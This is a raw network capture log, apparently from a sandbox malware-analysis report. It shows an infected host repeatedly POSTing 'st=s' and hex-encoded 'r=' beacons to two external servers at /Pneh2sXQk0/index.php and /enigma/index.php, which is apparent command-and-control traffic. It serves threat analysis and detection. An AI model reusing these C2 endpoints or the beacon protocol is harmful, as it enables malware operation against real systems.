                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:49.400629997 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:49 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1272192.168.2.551126193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:49.415174961 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:49.659615993 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:49 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1273192.168.2.551127193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:49.655024052 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:49.904206991 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:49 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1274192.168.2.551128193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:49.915750980 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:50.168057919 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:50 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1275192.168.2.551129193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:50.264131069 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:50.516494989 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:50 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1276192.168.2.551130193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:50.508085012 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:50.752542973 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:50 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1277192.168.2.551131193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:50.765695095 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:51.014405012 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:50 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1278192.168.2.551132193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:51.001929045 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:51.250554085 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:51 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1279192.168.2.551133193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:51.366453886 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:51.610553980 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:51 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1280192.168.2.551134193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:51.589031935 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:51.833916903 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:51 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1281192.168.2.551135193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:51.864643097 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:52.116436958 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:51 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1282192.168.2.551136193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:52.090903044 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:52.346362114 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:52 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1283192.168.2.551137193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:52.463251114 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:52.712085009 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:52 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1284192.168.2.551138193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:52.685513973 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:52.937618017 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:52 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1285192.168.2.551139193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:52.964256048 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:53.215853930 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:53 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1286192.168.2.551140193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:53.198038101 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:53.457808971 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:53 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1287192.168.2.551141193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:53.325068951 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:53.568650961 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:53 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1288192.168.2.551142193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:53.811758995 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:54.063719034 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:53 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
